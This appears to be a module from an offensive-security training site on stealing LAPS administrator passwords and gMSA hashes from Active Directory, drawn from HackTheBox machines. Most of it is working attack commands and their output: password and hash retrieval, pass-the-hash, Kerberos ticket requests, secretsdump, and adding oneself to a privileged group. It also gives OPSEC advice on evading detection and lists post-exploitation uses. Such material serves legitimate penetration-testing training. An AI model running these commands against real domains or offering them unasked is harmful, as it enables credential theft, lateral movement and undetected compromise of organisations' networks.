Back to All Modules

LAPS and gMSA

#Overview

Local Administrator Password Solution (LAPS) and Group Managed Service Accounts (gMSA) are Microsoft solutions for managing privileged account passwords. LAPS randomizes and rotates local Administrator passwords on domain-joined computers, storing them in the ms-Mcs-AdmPwd extended attribute. gMSA provides automated password management for service accounts, with the current password retrievable via the msDS-ManagedPassword attribute. When an attacker gains read access to these attributes — typically through group membership (LAPS_Readers) or ACL abuse — they can extract credentials without triggering any password-based authentication events.

#Prerequisites

  • Read access to ms-Mcs-AdmPwd attribute (LAPS_Readers group, or ACL delegation)
  • Read access to msDS-ManagedPassword attribute (specific group or ACL delegation)
  • Network access to LDAP on the Domain Controller

#Detection & Enumeration

#LAPS Enumeration

# Check if LAPS is installed
netexec smb <target> -u <user> -p <pass> -M laps
# Searches for LAPS-related registry entries

# Enumerate LAPS reader delegation (Windows, on-host)
# Upload AdmPwd.PS module
Find-AdmPwdExtendedRights -identity *
# Shows which OUs have LAPS delegation enabled
# Output: ExtendedRightHolders lists groups with delegation

Find-AdmPwdExtendedRights -identity 'Domain Controllers' | Select-Object ExtendedRightHolders
# Output: LAPS_Readers has delegation over Domain Controllers
BASH

#LAPS Group Membership Check

# BloodHound: check user's group membership for LAPS_Readers
# Edge: MemberOf -> LAPS_Readers group

# netexec: enumerate group membership
net user svc_deploy
# Output: Local Group Memberships: *LAPS_Readers*

# whoami (Windows)
whoami /groups | findstr LAPS
BASH

#gMSA Enumeration

# netexec gMSA module
netexec ldap <DC> -u <user> -p <pass> --gmsa
# Lists all gMSA accounts and whether you can read their passwords

# BloodHound: ReadGMSAPassword edge
# Check Outbound Control for ReadGMSAPassword

# bloodyAD: enumerate gMSA accounts
bloodyAD -d <domain> -u <user> -p '<pass>' --host <DC> get search \
  --type gmsa --attr sAMAccountName,msDS-ManagedPassword

# bloodhound-python will capture gMSA data
bloodhound-python -d <domain> -u <user> -p '<pass>' -dc <DC> -c all -ns <ip>
BASH

#Exploitation / Execution

#LAPS Password Retrieval

# netexec LAPS module (from attacker machine)
netexec ldap <DC> -u <user> -p <pass> -M laps

# Windows — AdmPwd.PS module
# Upload AdmPwd.PS to target machine
upload AdmPwd.PS

# Retrieve LAPS password for a specific computer
Get-AdmPwdPassword -ComputerName dc01 | Select-Object Password
# Output: /1B@QzE3{BAAwzs%KY$pTb7d

# Authenticate with LAPS password
evil-winrm -i 10.10.11.152 -u administrator -p '/1B@QzE3{BAAwzs%KY$pTb7d' -S
# -S: use SSL (port 5986)
BASH

#gMSA Password Retrieval

# netexec gMSA module
netexec ldap <DC> -u <user> -p <pass> --gmsa
# Output:
# Account: ansible_dev$         
# NTLM: 1c37d00093dc2a5f25176bf2d474afdc     
# PrincipalsAllowedToReadPassword: Infrastructure

# bloodyAD: read gMSA password
bloodyAD -d <domain> -u <user> -p '<pass>' --host <DC> \
  get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword
# Output:
# msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:1c37d00093dc2a5f25176bf2d474afdc
# msDS-ManagedPassword.B64ENCODED: <base64_blob>

# The B64ENCODED blob contains the full gMSA key material
# NTLM hash can be used directly (Pass-the-Hash)
netexec smb <DC> -u 'ANSIBLE_DEV$' -H 1c37d00093dc2a5f25176bf2d474afdc
BASH

#gMSA Ticket Generation

# gMSA accounts can request TGTs directly using their NTLM hash
getTGT.py -dc-ip <DC> <domain>/<gmsa_account>\$ -hashes :<NT_HASH>
export KRB5CCNAME=<gmsa_account>.ccache

# Then use the TGT for Kerberos-based tools
impacket-secretsdump -k -no-pass <domain>/<gmsa_account>\$@<DC>
BASH

#Access Control Patterns

#LAPS: Common ACL Paths

PathDescription
Direct LAPS_Readers membershipsvc_deploy in Timelapse
GenericAll on OU containing LAPS-delegated computersCan add self to LAPS read delegation
WriteProperty on OUCan modify LAPS delegation to add self

#gMSA: Common ACL Paths

PathDescription
Direct gMSA read group membershipInfrastructure group can read ANSIBLE_DEV$
AddSelf on the gMSA reader groupAdd self, then read password (TombWatcher)
Group with ReadGMSAPasswordtbrady could read delegator$ in Rebound
GenericAll on the gMSA reader groupAdd self, then read
# From TombWatcher: AddSelf on Infrastructure -> Read gMSA
bloodyAD -d tombwatcher.htb -u alfred -p basketball \
  --host dc01.tombwatcher.htb add groupMember Infrastructure alfred
# Now alfred can read ANSIBLE_DEV$ gMSA password
netexec ldap dc01.tombwatcher.htb -u alfred -p basketball --gmsa
BASH

#Password Rotation and Timing

  • LAPS: Default rotation period is 30 days. Check ms-Mcs-AdmPwdExpirationTime for the next rotation.
  • gMSA: Passwords are managed by the domain, rotated automatically. The gMSA password changes but the key material stays consistent for retrieval.
  • LAPS password validity: The retrieved password is valid until the next rotation — use it immediately.
  • gMSA hash stability: The NTLM hash derived from msDS-ManagedPassword is the current valid password.

#Common Pitfalls

  • No read permissions: The msDS-ManagedPassword attribute requires specific group membership. Check BloodHound for the correct group.
  • LAPS not installed: The ms-Mcs-AdmPwd attribute will not exist. Check if LAPS is deployed with netexec smb -M laps.
  • Computer not in LAPS scope: LAPS delegation may only cover specific OUs. Check Find-AdmPwdExtendedRights output.
  • gMSA B64 blob format: The raw msDS-ManagedPassword is a binary blob. Use bloodyAD or netexec to extract the useful NTLM hash.
  • gMSA account names: gMSA accounts end with $ but are NOT computer accounts. They use the msDS-GroupManagedServiceAccount object class.

#OPSEC Considerations

  • Reading LAPS and gMSA passwords is a passive LDAP read — generates no authentication events
  • Password attribute reads are logged as LDAP queries but are less monitored than authentication attempts
  • Using extracted passwords generates standard login events (4624 for interactive, 4625 for failed attempts)
  • gMSA password retrieval via LDAP is expected behavior from authorized services — blending in is possible

#Post-Exploitation Value

  • LAPS provides the local Administrator password for every LAPS-managed computer in scope
  • Local Administrator access enables credential dumping (SAM/SYSTEM), persistence, and lateral movement
  • gMSA accounts may have Kerberos delegation rights (as in Rebound where delegator$ had constrained delegation)
  • gMSA accounts may have specific service privileges useful for further escalation
  • Both LAPS and gMSA credentials bypass account lockout policies since they rotate automatically

#Cross-References

#Tool References

ToolLink
netexechttps://github.com/Pennyw0rth/NetExec
bloodyADhttps://github.com/CravateRouge/bloodyAD
AdmPwd.PS (LAPS toolkit)https://github.com/jfrmilner/LAPSToolkit
Impacket (getTGT)https://github.com/fortra/impacket

#Source Machines

  • Timelapse (Easy) — svc_deploy in LAPS_Readers -> Get-AdmPwdPassword -> Administrator LAPS password -> Evil-WinRM
  • TombWatcher (Medium) — alfred AddSelf to Infrastructure -> ReadGMSAPassword ANSIBLE_DEV$ -> ForceChangePassword Sam -> WriteOwner John -> shadow cred
  • Rebound (Insane) — tbrady ReadGMSAPassword on delegator$ -> gMSA NTLM hash -> constrained delegation -> RBCD -> DCSync